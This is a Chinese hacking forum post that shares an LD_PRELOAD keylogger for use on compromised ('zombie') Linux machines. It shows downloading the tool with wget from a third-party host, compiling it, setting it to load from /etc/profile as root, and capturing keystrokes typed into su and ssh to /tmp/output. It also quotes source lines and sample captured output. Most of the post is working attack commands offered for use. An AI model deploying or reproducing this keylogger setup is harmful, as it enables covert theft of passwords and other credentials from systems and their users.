切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
399 LD_PRELOAD keylogger 非本地记录[复制链接]
发表于 2013-1-20 18:45:04 | 显示全部楼层 |!read_mode!
为了满足LUCKY叔叔 我把我的神器发出来了 以前介绍的SSH 必须肉鸡本地的键盘输入文字才能记录 m
这一款不是
懒得复制 百度 LD_PRELOAD
还有很多LD_PRELOAD的好东西 以后在介绍
下载源码


[root@localhost ~]# wget lucky.fuzzexp.org/file/keylogger/LD_PRELOAD_keylogger.tar.gz
--2013-01-18 18:57:48--  [url]http://lucky.fuzzexp.org/file/keylogger/LD_PRELOAD_keylogger.tar.gz[/url]
Resolving lucky.fuzzexp.org... 199.27.134.214, 199.27.135.214
Connecting to lucky.fuzzexp.org|199.27.134.214|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2815 (2.7K) [application/octet-stream]
Saving to: `LD_PRELOAD_keylogger.tar.gz'

100%[====================================================================================>] 2,815       --.-K/s   in 0.003s  

2013-01-18 18:57:49 (934 KB/s) - `LD_PRELOAD_keylogger.tar.gz' saved [2815/2815]

[root@localhost ~]# tar xf LD_PRELOAD_keylogger.tar.gz 
[root@localhost ~]# cd LD_PRELOAD_keylogger
[root@localhost LD_PRELOAD_keylogger]# make
gcc -c -Wall -O3 -fPIC   -c -o keylogger.o keylogger.c
gcc keylogger.o -ldl -Wl,-soname,keylogger.so -shared  -o keylogger.so
[root@localhost LD_PRELOAD_keylogger]# 


设置变量


[root@localhost ~]# nano /etc/profile
[root@localhost ~]# source /etc/profile



内容
LD_PRELOAD=/root/LD_PRELOAD_keylogger/keylogger.so bash

如果不想设置那么直接输入


[root@localhost tmp]# LD_PRELOAD=/root/LD_PRELOAD_keylogger/keylogger.so bash


但是只是正对当前SHELL有效当对方执行ssh或者 su的时候 触发记录
例如:

[root@localhost tmp]# su -

或者
[root@localhost tmp]# ssh root@xxxxx

注意看源代码1
    #define OUTPUT_FILE "/tmp/output"

源代码 2
char *injected_files[] = { "/bin/su", "/usr/bin/ssh", 0 };

你可以加个cd ls什么的键盘快捷键不能记录 如 vi 123456.c 我输入vi 12(tab).c
[root@localhost LD_PRELOAD_keylogger]# cat /tmp/output 
ls
cd /tm	
ls -la
cat o	
su -
ls
cat /tm	o	
cd 
ls
cd lL	
ls
cat vim k	c	
vi k	c	

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB



操千曲而后晓声,观千剑而后识器。
发表于 2015-8-11 16:10:22 | 显示全部楼层

代码区

GMT+8, 2019-11-13 03:33

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部